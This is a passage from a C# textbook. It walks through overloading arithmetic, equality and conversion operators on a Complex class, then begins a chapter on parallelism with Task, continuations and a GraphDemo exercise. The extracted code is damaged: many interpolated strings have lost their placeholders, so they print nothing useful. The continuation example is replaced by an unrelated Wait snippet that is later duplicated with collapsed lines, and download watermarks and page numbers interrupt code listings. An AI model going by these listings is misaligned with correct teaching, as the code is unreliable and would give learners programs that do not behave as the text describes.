This constructor takes two int parameters and uses them to populate the
Real and Imaginary properties.
6. Override the ToString method as shown next in bold.
Click here to view code image
class Complex
{
...
public override string ToString() => $"({this.Real} +
{this.Imaginary}i) ";
}
This method returns a string representing the complex number in the
form (x + yi).
7. Add the overloaded + operator to the Complex class as shown in bold in
the code that follows:
Click here to view code image
class Complex
{
...
public static Complex operator +(Complex lhs, Complex rhs)
=>
new Complex(lhs.Real + rhs.Real, lhs.Imaginary +
rhs.Imaginary);
}
This is the binary addition operator. It takes two Complex objects and
adds them together by performing the calculation shown in the table at
the start of the exercise. The operator returns a new Complex object
containing the results of this calculation.
8. Add the overloaded – operator to the Complex class.
Click here to view code image
class Complex
Download from finelybook [email protected]
747
{
...
public static Complex operator -(Complex lhs, Complex rhs)
=>
new Complex(lhs.Real - rhs.Real, lhs.Imaginary -
rhs.Imaginary);
}
This operator follows the same form as the overloaded + operator.
9. Implement the * operator and / operator by adding the code shown in
bold to the Complex class.
Click here to view code image
class Complex
{
...
public static Complex operator *(Complex lhs, Complex rhs)
=>
new Complex(lhs.Real * rhs.Real - lhs.Imaginary *
rhs.Imaginary,
lhs.Imaginary * rhs.Real + lhs.Real *
rhs.Imaginary);
public static Complex operator /(Complex lhs, Complex rhs)
{
int realElement = (lhs.Real * rhs.Real + lhs.Imaginary *
rhs.Imaginary) /
(rhs.Real * rhs.Real + rhs.Imaginary *
rhs.Imaginary);
int imaginaryElement = (lhs.Imaginary * rhs.Real -
lhs.Real * rhs.Imaginary) /
(rhs.Real * rhs.Real + rhs.Imaginary *
rhs.Imaginary);
return new Complex(realElement, imaginaryElement);
}
}
These operators follow the same form as the previous two operators,
although the calculations are a little more complicated. (The calculation
for the / operator has been broken down into two steps to avoid lengthy
lines of code.)
10. Display the Program.cs file in the Code and Text Editor window. Add
the following statements shown in bold to the doWork method of the
Download from finelybook [email protected]
748
Program class and delete the // TODO: comment:
Click here to view code image
static void doWork()
{
Complex first = new Complex(10, 4);
Complex second = new Complex(5, 2);
Console.WriteLine($"first is ");
Console.WriteLine($"second is ");
Complex temp = first + second;
Console.WriteLine($"Add: result is ");
temp = first - second;
Console.WriteLine($"Subtract: result is ");
temp = first * second;
Console.WriteLine($"Multiply: result is ");
temp = first / second;
Console.WriteLine($"Divide: result is ");
}
This code creates two Complex objects that represent the complex
values (10 + 4i) and (5 + 2i). The code displays them and then tests each
of the operators you have just defined, displaying the results in each
case.
11. On the Debug menu, click Start Without Debugging.
Verify that the application displays the results shown in the following
image:
12. Close the application, and return to the Visual Studio 2017 programming
environment.
You have now created a type that models complex numbers and supports
Download from finelybook [email protected]
749
basic arithmetic operations. In the next exercise, you will extend the Complex
class and provide the equality operators, == and !=.
Implement the equality operators
1. In Visual Studio 2017, display the Complex.cs file in the Code and Text
Editor window.
2. Add the == and != operators to the Complex class as shown in bold in
the following example.
Click here to view code image
class Complex
{
...
public static bool operator ==(Complex lhs, Complex rhs) =>
lhs.Equals(rhs);
public static bool operator !=(Complex lhs, Complex rhs) =>
!(lhs.Equals(rhs));
}
Notice that both of these operators make use of the Equals method. The
Equals method compares an instance of a class against another instance
specified as an argument. It returns true if they have equivalent values
and false otherwise. You need to provide your own implementation of
this method for the equality operators to work correctly.
3. Override the Equals method in the Complex class, by adding the
following shown here in bold:
Click here to view code image
class Complex
{
...
public override bool Equals(Object obj)
{
if (obj is Complex)
{
Complex compare = (Complex)obj;
return (this.Real == compare.Real) &&
(this.Imaginary == compare.Imaginary);
}
else
{
Download from finelybook [email protected]
750
return false;
}
}
}
The Equals method takes an Object as a parameter. This code verifies
that the type of the parameter is actually a Complex object. If it is, this
code compares the values in the Real and Imaginary properties in the
current instance and the parameter passed in. If they are the same, the
method returns true; otherwise, it returns false. If the parameter passed
in is not a Complex object, the method returns false.
Important It is tempting to write the Equals method like this:
Click here to view code image
public override bool Equals(Object obj)
{
Complex compare = obj as Complex;
if (compare != null)
{
return (this.Real == compare.Real) &&
(this.Imaginary == compare.Imaginary);
}
else
{
return false;
}
}
However, the expression compare != null invokes the !=
operator of the Complex class, which calls the Equals method
again, resulting in a recursive loop.
4. On the Build menu, click Rebuild Solution.
The Error List window displays the following warning messages:
Click here to view code image
'ComplexNumbers.Complex' overrides Object.Equals(object o) but
does not override Object.GetHashCode()
Download from finelybook [email protected]
751
'ComplexNumbers.Complex' defines operator == or operator != but
does not override Object.GetHashCode()
If you define the != and == operators, you should also override the
GetHashCode methods inherited from System.Object.
Note If the Error List window is not visible, click Error List on the
View menu.
5. Override the GetHashCode method to the Complex class by adding the
following shown here in bold. This implementation simply calls the
method inherited from the Object class, but you can provide your own
mechanism to generate a hash code for an object if you prefer.
Click here to view code image
Class Complex
{
...
public override int GetHashCode()
{
return base.GetHashCode();
}
}
6. On the Build menu, click Rebuild Solution.
Verify that the solution now builds without reporting any warnings.
7. Display the Program.cs file in the Code and Text Editor window. Add
the following code shown in bold to the end of the doWork method:
Click here to view code image
static void doWork()
{
...
if (temp == first)
{
Console.WriteLine("Comparison: temp == first");
}
else
Download from finelybook [email protected]
752
{
Console.WriteLine("Comparison: temp != first");
}
if (temp == temp)
{
Console.WriteLine("Comparison: temp == temp");
}
else
{
Console.WriteLine("Comparison: temp != temp");
}
}
Note The expression temp == temp generates the warning message
“Comparison made to same variable; did you mean to compare to
something else?” In this case, you can ignore the warning because
this comparison is intentional; it is to verify that the == operator is
working as expected.
8. On the Debug menu, click Start Without Debugging. Verify that the
final two messages displayed are these:
Comparison: temp != first
Comparison: temp == temp
9. Close the application, and return to Visual Studio 2017.
Understanding conversion operators
Sometimes, you need to convert an expression of one type to another. For
example, the following method is declared with a single double parameter:
Click here to view code image
class Example
{
public static void MyDoubleMethod(double parameter)
{
...
Download from finelybook [email protected]
753
}
}
You might reasonably expect that only values of type double could be
used as arguments when your code calls MyDoubleMethod, but this is not so.
The C# compiler also allows MyDoubleMethod to be called with an argument
of some other type, but only if the value of the argument can be converted to
a double. For example, if you provide an int argument, the compiler generates
code that converts the value of the argument to a double when the method is
called.
Providing built-in conversions
The built-in types have some built-in conversions. For example, as mentioned
previously, an int can be implicitly converted to a double. An implicit
conversion requires no special syntax and never throws an exception.
Click here to view code image
Example.MyDoubleMethod(42); // implicit int-to-double conversion
An implicit conversion is sometimes called a widening conversion
because the result is wider than the original value—it contains at least as
much information as the original value, and nothing is lost. In the case of int
and double, the range of double is greater than that of int, and all int values
have an equivalent double value. However, the converse is not true, and a
double value cannot be implicitly converted to an int:
Click here to view code image
class Example
{
public static void MyIntMethod(int parameter)
{
...
}
}
...
Example.MyIntMethod(42.0); // compile-time error
When you convert a double to an int, you run the risk of losing
information, so the conversion will not be performed automatically.
(Consider what would happen if the argument to MyIntMethod were 42.5.
How should this be converted?) A double can be converted to an int, but the
Download from finelybook [email protected]
754
conversion requires an explicit notation (a cast):
Click here to view code image
Example.MyIntMethod((int)42.0);
An explicit conversion is sometimes called a narrowing conversion
because the result is narrower than the original value (that is, it can contain
less information) and can throw an OverflowException exception if the
resulting value is out of the range of the target type. In C#, you can create
conversion operators for your own user-defined types to control whether it is
sensible to convert values to other types, and you can also specify whether
these conversions are implicit or explicit.
Implementing user-defined conversion operators
The syntax for declaring a user-defined conversion operator has some
similarities to that for declaring an overloaded operator, but it also has some
important differences. Here’s a conversion operator that allows an Hour
object to be implicitly converted to an int:
Click here to view code image
struct Hour
{
...
public static implicit operator int (Hour from)
{
return from.value;
}
private int value;
}
A conversion operator must be public, and it must also be static. The type
from which you are converting is declared as the parameter (in this case,
Hour), and the type to which you are converting is declared as the type name
after the keyword operator (in this case, int). There is no return type specified
before the keyword operator.
When declaring your own conversion operators, you must specify whether
they are implicit conversion operators or explicit conversion operators. You
do this by using the implicit and explicit keywords. The Hour to int
conversion operator shown in the preceding example is implicit, meaning that
Download from finelybook [email protected]
755
the C# compiler can use it without requiring a cast.
Click here to view code image
class Example
{
public static void MyOtherMethod(int parameter) { ... }
public static void Main()
{
Hour lunch = new Hour(12);
Example.MyOtherMethod(lunch); // implicit Hour to int
conversion
}
}
If the conversion operator had been declared with explicit, the preceding
example would not have compiled because an explicit conversion operator
requires a cast.
Click here to view code image
Example.MyOtherMethod((int)lunch); // explicit Hour to int conversion
When should you declare a conversion operator as explicit or implicit? If
a conversion is always safe, does not run the risk of losing information, and
cannot throw an exception, it can be defined as an implicit conversion.
Otherwise, it should be declared as an explicit conversion. Converting from
an Hour to an int is always safe—every Hour has a corresponding int value—
so it makes sense for it to be implicit. An operator that converts a string to an
Hour should be explicit because not all strings represent valid Hours. (The
string “7” is fine, but how would you convert the string “Hello, World” to an
Hour?)
Creating symmetric operators, revisited
Conversion operators provide you with an alternative way to resolve the
problem of providing symmetric operators. For example, instead of providing
three versions of operator+ (Hour + Hour, Hour + int, and int + Hour) for
the Hour structure, as shown earlier, you can provide a single version of
operator+ (that takes two Hour parameters) and an implicit int to Hour
conversion, like this:
Click here to view code image
struct Hour
Download from finelybook [email protected]
756
{
public Hour(int initialValue) => this.value = initialValue;
public static Hour operator +(Hour lhs, Hour rhs) => new
Hour(lhs.value + rhs.value);
public static implicit operator Hour (int from) => new Hour
(from);
...
private int value;
}
If you add an Hour to an int (in either order), the C# compiler
automatically converts the int to an Hour and then calls operator+ with two
Hour arguments, as demonstrated here:
Click here to view code image
void Example(Hour a, int b)
{
Hour eg1 = a + b; // b converted to an Hour
Hour eg2 = b + a; // b converted to an Hour
}
Writing conversion operators
In the final exercise of this chapter, you will add conversion operators to the
Complex class. You will start by writing a pair of conversion operators that
convert between the int type and the Complex type. Converting an int to a
Complex object is always a safe process and never loses information (because
an int is really just a complex number without an imaginary element). You
will implement this as an implicit conversion operator. However, the
converse is not true—to convert a Complex object into an int, you have to
discard the imaginary element. Thus, you will implement this conversion
operator as explicit.
Implement the conversion operators
1. Return to Visual Studio 2017 and display the Complex.cs file in the
Code and Text Editor window. Add the constructor shown in bold in the
code that follows to the Complex class, immediately after the existing
constructor and before the ToString method. This new constructor takes
a single int parameter, which it uses to initialize the Real property. The
Download from finelybook [email protected]
757
Imaginary property is set to 0.
Click here to view code image
class Complex
{
...
public Complex(int real)
{
this.Real = real;
this.Imaginary = 0;
}
...
}
2. Add the following implicit conversion operator shown in bold to the
Complex class.
Click here to view code image
class Complex
{
...
public static implicit operator Complex(int from) => new
Complex(from);
...
}
This operator converts from an int to a Complex object by returning a
new instance of the Complex class built using the constructor you
created in the previous step.
3. Add the following explicit conversion operator shown in bold to the
Complex class.
Click here to view code image
class Complex
{
...
public static explicit operator int(Complex from) =>
from.Real;
...
}
This operator takes a Complex object and returns the value of the Real
property. This conversion discards the imaginary element of the
complex number.
Download from finelybook [email protected]
758
4. Display the Program.cs file in the Code and Text Editor window. Add
the following code shown in bold to the end of the doWork method:
Click here to view code image
static void doWork()
{
...
Console.WriteLine($"Current value of temp is ");
if (temp == 2)
{
Console.WriteLine("Comparison after conversion: temp ==
2");
}
else
{
Console.WriteLine("Comparison after conversion: temp !=
2");
}
temp += 2;
Console.WriteLine($"Value after adding 2: temp = ");
}
These statements test the implicit operator that converts an int to a
Complex object. The if statement compares a Complex object to an int.
The compiler generates code that converts the int into a Complex object
first and then invokes the == operator of the Complex class. The
statement that adds 2 to the temp variable converts the int value 2 into a
Complex object and then uses the + operator of the Complex class.
5. Add the following statements shown in bold to end of the doWork
method:
Click here to view code image
static void doWork()
{
...
int tempInt = temp;
Console.WriteLine($"Int value after conversion: tempInt ==
");
}
The first statement attempts to assign a Complex object to an int
variable.
Download from finelybook [email protected]
759
6. On the Build menu, click Rebuild Solution.
The solution fails to build, and the compiler reports the following error
in the Error List window:
Click here to view code image
Cannot implicitly convert type
'ComplexNumbers.Complex' to 'int'. An explicit
conversion exists (are you missing a cast?)
The operator that converts from a Complex object to an int is an explicit
conversion operator, so you must specify a cast.
7. Modify the statement that attempts to store a Complex value in an int
variable to use a cast, like this:
int tempInt = (int)temp;
8. On the Debug menu, click Start Without Debugging. Verify that the
solution now builds and that the final four messages displayed look like
this:
Click here to view code image
Current value of temp is (2 + 0i)
Comparison after conversion: temp == 2
Value after adding 2: temp = (4 + 0i)
Int value after conversion: tempInt == 4
9. Close the application, and return to Visual Studio 2017.
Summary
In this chapter, you learned how to overload operators and provide
functionality specific to a class or structure. You implemented a number of
common arithmetic operators, and you also created operators with which you
can compare instances of a class. Finally, you learned how to create implicit
and explicit conversion operators.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 23, “Improving throughput by using
tasks.”
Download from finelybook [email protected]
760
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Implement
an
operator
Write the keywords public and static, followed by the return
type, followed by the operator keyword, followed by the
operator symbol being declared, followed by the appropriate
parameters between parentheses. Implement the logic for the
operator in the body of the method. For example:
Click here to view code image
class Complex
{
...
public static bool operator==(Complex lhs, Complex
rhs)
{
... // Implement logic for == operator
}
...
}
Define a
conversion
operator
Write the keywords public and static, followed by the keyword
implicit or explicit, followed by the operator keyword,
followed by the type to which the data is being converted,
followed by the type from which the data is being converted as
a single parameter between parentheses. For example:
Click here to view code image
class Complex
{
...
public static implicit operator Complex(int from)
{
... // code to convert from an int
}
...
}
Download from finelybook [email protected]
761
PART IV
Building Universal Windows
Platform applications with C#
So far, you have gained a thorough grounding in the syntax and semantics of
the C# language. It’s now time to examine how you can use this knowledge
to take advantage of the features that Windows 10 provides for building
applications that run unchanged on devices ranging from a desktop PC to a
smartphone. You can construct applications that run in different
environments by using the Universal Windows Platform (UWP) application
framework. UWP applications can detect and adapt to the hardware on which
they execute. They can receive input through a touch-sensitive screen or by
using voice commands, and a UWP app can be designed to be aware of the
location and orientation of the device on which it is running. You can also
build cloud-connected applications; these are applications that are not tied to
a specific computer but can follow users when they sign in on another device.
In short, Visual Studio provides the tools for developing highly mobile,
highly graphical, highly connected applications that can run almost
anywhere.
Part IV introduces you to the requirements of building UWP applications.
You will see examples of the asynchronous model of programming
developed as part of the .NET Framework. You will also learn how to
integrate voice activation into your application and how to build a UWP
application that connects to the cloud to retrieve and present complex
information in a natural and easily navigab le style.
Download from finelybook [email protected]
762
CHAPTER 23
Improving throughput by using
tasks
After completing the chapter, you will be able to:
Describe the benefits of implementing parallel operations in an
application.
Use the Task class to create and run parallel operations in an
application.
Use the Parallel class to parallelize some common programming
constructs.
Cancel long-running tasks and handle exceptions raised by parallel
operations.
In the bulk of the preceding chapters in this book, you’ve learned how to use
C# to write programs that run in a single-threaded manner. By single-
threaded, I mean that at any one point in time, a program has been executing
a single instruction. This might not always be the most efficient approach for
an application to take. If you have the appropriate processing resources
available, some applications might run more quickly if you divide them into
parallel paths of execution that can run concurrently. This chapter is
concerned with improving throughput in your applications by maximizing the
use of available processing power. Specifically, in this chapter, you will learn
how to use Task objects to apply effective multitasking to computationally
intensive applications.
Download from finelybook [email protected]
763
Why perform multitasking by using parallel
processing?
There are two primary reasons why you might want to perform multitasking
in an application:
To improve responsiveness A long-running operation may involve
tasks that do not require processor time. Common examples include
I/O-bound operations such as reading from or writing to a local disk or
sending and receiving data across a network. In both of these cases, it
does not make sense to have a program burn CPU cycles waiting for
the operation to complete when the program could be doing something
more useful instead (such as responding to user input). Most users of
mobile devices take this form of responsiveness for granted and don’t
expect their tablet to simply halt while it is sending and receiving
email, for example. Chapter 24, “Improving response time by
performing asynchronous operations,” discusses these features in more
detail.
To improve scalability If an operation is CPU bound, you can
improve scalability by making efficient use of the processing resources
available and using these resources to reduce the time required to
execute the operation. A developer can determine which operations
include tasks that can be performed in parallel and arrange for these
elements to be run concurrently. As more computing resources are
added, more instances of these tasks can be run in parallel. Until
relatively recently, this model was suitable only for scientific and
engineering systems that either had multiple CPUs or were able to
spread the processing across different computers networked together.
However, most modern computing devices now contain powerful
CPUs that are capable of supporting true multitasking, and many
operating systems provide primitives that enable you to parallelize
tasks quite easily.
The rise of the multicore processor
At the turn of the century, the cost of a decent personal computer was in the
range of $800 to $1,500. Today, a decent personal computer still costs about
Download from finelybook [email protected]
764
the same, even after 17 years of price inflation. The specification of a typical
computer these days is likely to include a processor running at a speed of
between 2 GHz and 3 GHz, over 1,000 GB of hard disk storage (possibly
using solid-state technology, for speed), 8 GB of RAM, high-speed and high-
resolution graphics, fast network interfaces, and a rewritable DVD drive.
Seventeen years ago, the processor speed for a typical machine was between
500 MHz and 1 GHz, 80 GB was a large hard disk, Windows ran quite
happily with 256 MB or less of RAM, and rewritable CD drives cost well
over $100. (Rewritable DVD drives were rare and extremely expensive.) This
is the joy of technological progress: ever faster and more powerful hardware
at cheaper and cheaper prices.
This is not a new trend. In 1965, Gordon E. Moore, co-founder of Intel,
wrote a paper titled “Cramming More Components onto Integrated Circuits,”
which discussed how the increasing miniaturization of components enabled
more transistors to be embedded on a silicon chip, and how the falling costs
of production as the technology became more accessible would lead
economics to dictate squeezing as many as 65,000 components onto a single
chip by 1975. Moore’s observations lead to the dictum frequently referred to
as Moore’s Law, which states that the number of transistors that can be
placed inexpensively on an integrated circuit will increase exponentially,
doubling approximately every two years. (Actually, Gordon Moore was
initially more optimistic than this, postulating that the volume of transistors
was likely to double every year, but he later modified his calculations.) The
ability to pack transistors together led to the ability to pass data between them
more quickly. This meant we could expect to see chip manufacturers produce
faster and more powerful microprocessors at an almost unrelenting pace,
enabling software developers to write ever more complicated software that
would run more quickly.
Moore’s Law concerning the miniaturization of electronic components
still holds, even half a century later. However, physics has started to
intervene. A limit occurs when it is not possible to transmit signals between
transistors on a single chip any faster, no matter how small or densely packed
they are. To a software developer, the most noticeable result of this limitation
is that processors have stopped getting faster. Ten years ago, a fast processor
ran at 3 GHz. Today, a fast processor still runs at 3 GHz.
The limit to the speed at which processors can transmit data between
Download from finelybook [email protected]
765
components has caused chip companies to look at alternative mechanisms for
increasing the amount of work a processor can do. The result is that most
modern processors now have two or more processor cores. Effectively, chip
manufacturers have put multiple processors on the same chip and added the
necessary logic to enable them to communicate and coordinate with one
another. Quad-core (four cores) and eight-core processors are now common.
Chips with 16, 32, and 64 cores are available, and the price of dual-core and
quad-core processors is now sufficiently low that they are an expected
element in laptops, tablets, and smart cell phones. So, although processors
have stopped speeding up, you can now expect to get more of them on a
single chip.
What does this mean to a developer writing C# applications?
In the days before multicore processors, you could speed up a single-
threaded application simply by running it on a faster processor. With
multicore processors, this is no longer the case. A single-threaded application
will run at the same speed on a single-core, dual-core, or quad-core processor
that all have the same clock frequency. The difference is that on a dual-core
processor, as far as your application is concerned, one of the processor cores
will be sitting around idle, and on a quad-core processor, three of the cores
will be simply ticking away, waiting for work. To make the best use of
multicore processors, you need to write your applications to take advantage
of multitasking.
Implementing multitasking by using the Microsoft
.NET Framework
Multitasking is the ability to do more than one thing at the same time. It is
one of those concepts that is easy to describe but until recently has been
difficult to implement.
In the optimal scenario, an application running on a multicore processor
performs as many concurrent tasks as there are processor cores available,
keeping each of the cores busy. However, you need to consider many issues
to implement concurrency, including the following:
How can you divide an application into a set of concurrent operations?
Download from finelybook [email protected]
766
How can you arrange for a set of operations to execute concurrently, on
multiple processors?
How can you ensure that you attempt to perform only as many
concurrent operations as there are processors available?
If an operation is blocked (such as while waiting for I/O to complete),
how can you detect this and arrange for the processor to run a different
operation rather than sit idle?
How can you determine when one or more concurrent operations have
completed?
To an application developer, the first question is a matter of application
design. The remaining questions depend on the programmatic infrastructure.
Microsoft provides the Task class and a collection of associated types in the
System.Threading.Tasks namespace to help address these issues.
Important The point about application design is fundamental. If an
application is not designed with multitasking in mind, then it doesn’t
matter how many processor cores you throw at it, it will not run any
faster than it would on a single-core machine.
Tasks, threads, and the ThreadPool
The Task class is an abstraction of a concurrent operation. You create a Task
object to run a block of code. You can instantiate multiple Task objects and
start them running in parallel if sufficient processors or processor cores are
available.
Note From now on, I will use the term processor to refer to either a
single-core processor or a single processor core on a multicore
processor.
Download from finelybook [email protected]
767
Internally, the Windows Runtime (WinRT) implements tasks and
schedules them for execution by using Thread objects and the ThreadPool
class. Multithreading and thread pools have been available with the .NET
Framework since version 1.0, and if you are building traditional desktop
applications, you can use the Thread class in the System.Threading
namespace directly in your code. However, the Thread class is not available
for Universal Windows Platform (UWP) apps; instead, you use the Task
class.
The Task class provides a powerful abstraction for threading with which
you can easily distinguish between the degree of parallelization in an
application (the tasks) and the units of parallelization (the threads). On a
single-processor computer, these items are usually the same. However, on a
computer with multiple processors or with a multicore processor, they are
different. If you design a program based directly on threads, you will find that
your application might not scale very well; the program will use the number
of threads you explicitly create, and the operating system will schedule only
that number of threads. This can lead to overloading and poor response time
if the number of threads greatly exceeds the number of available processors,
or to inefficiency and poor throughput if the number of threads is less than
the number of processors.
WinRT optimizes the number of threads required to implement a set of
concurrent tasks and schedules them efficiently according to the number of
available processors. It implements a queuing mechanism to distribute the
workload across a set of threads allocated to a thread pool (implemented by
using a ThreadPool object). When a program creates a Task object, the task is
added to a global queue. When a thread becomes available, the task is
removed from the global queue and is executed by that thread. The
ThreadPool class implements a number of optimizations and uses a work-
stealing algorithm to ensure that threads are scheduled efficiently.
Note The ThreadPool class was available in previous editions of the
.NET Framework, but it was enhanced significantly in .NET
Download from finelybook [email protected]
768
Framework 4.0 to support Tasks.
You should note that the number of threads created to handle your tasks is
not necessarily the same as the number of processors. Depending on the
nature of the workload, one or more processors might be busy performing
high-priority work for other applications and services. Consequently, the
optimal number of threads for your application might be less than the number
of processors in the machine. Alternatively, one or more threads in an
application might be waiting for long-running memory access, I/O, or
network operation to complete, leaving the corresponding processors free. In
this case, the optimal number of threads might be more than the number of
available processors. WinRT follows an iterative strategy, known as a hill-
climbing algorithm, to dynamically determine the ideal number of threads for
the current workload.
The important point is that all you have to do in your code is divide, or
partition, your application into tasks that can be run in parallel. WinRT takes
responsibility for creating the appropriate number of threads based on the
processor architecture and workload of your computer, associating your tasks
with these threads and arranging for them to be run efficiently. It does not
matter if you partition your work into too many tasks because WinRT will
attempt to run only as many concurrent threads as is practical; in fact, you are
encouraged to overpartition your work because this will help ensure that your
application scales if you move it to a computer that has more processors
available.
Creating, running, and controlling tasks
You can create Task objects by using the Task constructor. The Task
constructor is overloaded, but all versions expect you to provide an Action
delegate as a parameter. Chapter 20, “Decoupling application logic and
handling events,” illustrates that an Action delegate references a method that
does not return a value. A Task object invokes this delegate when it is
scheduled to run. The following example creates a Task object that uses a
delegate to run the method called doWork:
Click here to view code image
Download from finelybook [email protected]
769
Task task = new Task(doWork);
...
private void doWork()
{
// The task runs this code when it is started
...
}
Tip The default Action type references a method that takes no
parameters. Other overloads of the Task constructor take an
Action<object> parameter representing a delegate that refers to a
method that takes a single object parameter. With these overloads, you
can pass data into the method run by the task. The following code
shows an example:
Click here to view code image
Action<object> action;
action = doWorkWithObject;
object parameterData = ...;
Task task = new Task(action, parameterData);
...
private void doWorkWithObject(object o)
{
...
}
After you create a Task object, you can set it running by using the Start
method, like this:
Task task = new Task(...);
task.Start();
The Start method is overloaded, and you can optionally specify a
TaskCreationOptions object to provide hints about how to schedule and run
the task.
More Info
Download from finelybook [email protected]
770
For more information about the TaskCreationOptions enumeration,
consult the documentation describing the .NET Framework class library
that is provided with Visual Studio.
Creating and running a task is a very common process, and the Task class
provides the static Run method with which you can combine these operations.
The Run method takes an Action delegate specifying the operation to perform
(like the Task constructor) but starts the task running immediately. It returns a
reference to the Task object. You can use it like this:
Click here to view code image
Task task = Task.Run(() => doWork());
When the method run by the task completes, the task finishes and the thread
used to run the task can be recycled to execute another task.
When a task completes, you can arrange for another task to be scheduled
immediately by creating a continuation. To do this, call the ContinueWith
method of a Task object. When the action performed by the Task object
completes, the scheduler automatically creates a new Task object to run the
action specified by the ContinueWith method. The method specified by the
continuation expects a Task parameter, and the scheduler passes into the
method a reference to the task that completed. The value returned by
ContinueWith is a reference to the new Task object. The following code
example creates a Task object that runs the doWork method and specifies a
continuation that runs the doMoreWork method in a new task when the first
task completes:
Click here to view code image
Task task = new Task(doWork);
task.Start();
Task newTask = task.ContinueWith(doMoreWork);
...
private void doWork()
{
// The task runs this code when it is started
...
}
...
private void doMoreWork(Task task)
Download from finelybook [email protected]
771
{
// The continuation runs this code when doWork completes
...
}
The ContinueWith method is heavily overloaded, and you can provide
some parameters that specify additional items, including a
TaskContinuationOptions value. The TaskContinuationOptions type is an
enumeration that contains a superset of the values in the
TaskCreationOptions enumeration. The additional values available include
the following:
NotOnCanceled and OnlyOnCanceled The NotOnCanceled option
specifies that the continuation should run only if the previous action
completes and is not canceled, and the OnlyOnCanceled option
specifies that the continuation should run only if the previous action is
canceled. The section “Canceling tasks and handling exceptions” later
in this chapter describes how to cancel a task.
NotOnFaulted and OnlyOnFaulted The NotOnFaulted option
indicates that the continuation should run only if the previous action
completes and does not throw an unhandled exception. The
OnlyOnFaulted option causes the continuation to run only if the
previous action throws an unhandled exception. The section
“Canceling tasks and handling exceptions” provides more information
on how to manage exceptions in a task.
NotOnRanToCompletion and OnlyOnRanToCompletion The
NotOnRanToCompletion option specifies that the continuation should
run only if the previous action does not complete successfully; it must
either be canceled or throw an exception. OnlyOnRanToCompletion
causes the continuation to run only if the previous action completes
successfully.
The following code example shows how to add a continuation to a task that
runs only if the initial action does not throw an unhandled exception:
Click here to view code image
Task task2 = ...
task2.Start();
...
task2.Wait(); // Wait at this point until task2 completes
Download from finelybook [email protected]
772
A common requirement of applications that invoke operations in parallel
is to synchronize tasks. The Task class provides the Wait method, which
implements a simple task coordination mechanism. Using this method, you
can suspend execution of the current thread until the specified task
completes, like this:
Click here to view code image
Task task2 = ... task2.Start(); ... task2.Wait(); // Wait at this
point until task2 completes
You can wait for a set of tasks by using the static WaitAll and WaitAny
methods of the Task class. Both methods take a params array containing a set
of Task objects. The WaitAll method waits until all specified tasks have
completed, and WaitAny stops until at least one of the specified tasks has
finished. You use them like this:
Click here to view code image
Task.WaitAll(task, task2); // Wait for both task and task2 to
complete Task.WaitAny(task, task2);
// Wait for either task or task2 to complete
Using the Task class to implement parallelism
In the next exercise, you will use the Task class to parallelize processor-
intensive code in an application, and you will see how this parallelization
reduces the time taken for the application to run by spreading the
computations across multiple processor cores.
The application, called GraphDemo, consists of a page that uses an Image
control to display a graph. The application plots the points for the graph by
performing a complex calculation.
Note The exercises in this chapter are intended to be run on a computer
with a multicore processor. If you have only a single-core CPU, you
will not observe the same effects. Also, you should not start any
additional programs or services between exercises because these might
affect the results that you see.
Download from finelybook [email protected]
773
Examine and run the GraphDemo single-threaded application
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the GraphDemo solution, which is located in the \Microsoft
Press\VCSBS\Chapter 23\GraphDemo folder in your Documents folder.
This is a Universal Windows Platform app.
3. In Solution Explorer, in the GraphDemo project, double-click the file
MainPage.xaml to display the form in the Design View window.
Apart from the Grid control defining the layout, the form contains the
following important controls:
• An Image control called graphImage. This image control displays the
graph rendered by the application.
• A Button control called plotButton. The user clicks this button to
generate the data for the graph and display it in the graphImage
control.
Note In the interest of keeping the operation of the application in
this exercise simple, it displays the button on the page. In a
production UWP app, buttons such as this should be located on a
command bar.
• A TextBlock control called duration. The application displays the time
taken to generate and render the data for the graph in this label.
4. In Solution Explorer, expand the MainPage.xaml file and then double-
click MainPage.xaml.cs to display the code for the form in the Code and
Text Editor window.
The form uses a WriteableBitmap object (defined in the
Windows.UI.Xaml.Media.Imaging namespace) called graphBitmap to
Download from finelybook [email protected]
774
render the graph. The code in the plotButton_Click method creates this
object, but the class instance variables pixelWidth and pixelHeight
specify the horizontal and vertical resolution, respectively, for the
WriteableBitmap object:
Click here to view code image
public partial class MainPage : Window
{
// Reduce pixelWidth and pixelHeight if there is
insufficient memory available
private int pixelWidth = 10000;
private int pixelHeight = 7500;
...
}
Note This application was developed and tested on a desktop
computer with 8 GB of memory (it was also tested on a 4 GB
machine). If your computer has less memory than this available,
you might need to reduce the values in the pixelWidth and
pixelHeight variables, otherwise, the application might generate
OutOfMemoryException exceptions, causing the application to
terminate without warning.
Don’t try and increase these values if you have a bigger
machine; the UWP model has a limit on the amount of memory
that an application can use (currently around 2 GB, even on a
desktop computer), and if you exceed this value your application
might be terminated without warning. The rationale behind this
limitation is that many devices on which UWP applications run are
memory constrained, and a single app should not be allowed to
consume all of the memory resources available to the detriment of
other apps.
5. Examine the code for the plotButton_Click method:
Click here to view code image
Download from finelybook [email protected]
775
private void plotButton_Click(object sender, RoutedEventArgs e)
{
...
Random rand = new Random();
redValue = (byte)rand.Next(0xFF);
greenValue = (byte)rand.Next(0xFF);
blueValue = (byte)rand.Next(0xFF);
int dataSize = bytesPerPixel * pixelWidth * pixelHeight;
byte data[] = new byte[dataSize];
Stopwatch watch = Stopwatch.StartNew();
generateGraphData(data);
duration.Text = $"Duration (ms):
{watch.ElapsedMilliseconds}";
WriteableBitmap graphBitmap = new
WriteableBitmap(pixelWidth, pixelHeight);
using (Stream pixelStream =
graphBitmap.PixelBuffer.AsStream())
{
pixelStream.Seek(0, SeekOrigin.Begin);
pixelStream.Write(data, 0, data.Length);
graphBitmap.Invalidate();
graphImage.Source = graphBitmap;
}
...
}
This method runs when the user clicks the plotButton button.
You will click this button several times later in the exercise, which will
let you see that a new version of the graph has been drawn each time this
method generates a random set of values for the red, green, and blue
intensity of the points that are plotted. (The graph will be a different
color each time you click this button.)
The next two lines instantiate a byte array that will hold the data for the
graph. The size of this array depends on the resolution of the
WriteableBitmap object, determined by the pixelWidth and pixelHeight
fields. Additionally, this size has to be scaled by the amount of memory
required to render each pixel; the WriteableBitmap class uses 4 bytes for
each pixel, which specify the relative red, green, and blue intensity of
each pixel and the alpha blending value of the pixel. (The alpha blending
value determines the transparency and brightness of the pixel.)
Download from finelybook [email protected]
776
The watch variable is a System.Diagnostics.Stopwatch object. The
StopWatch type is useful for timing operations. The static StartNew
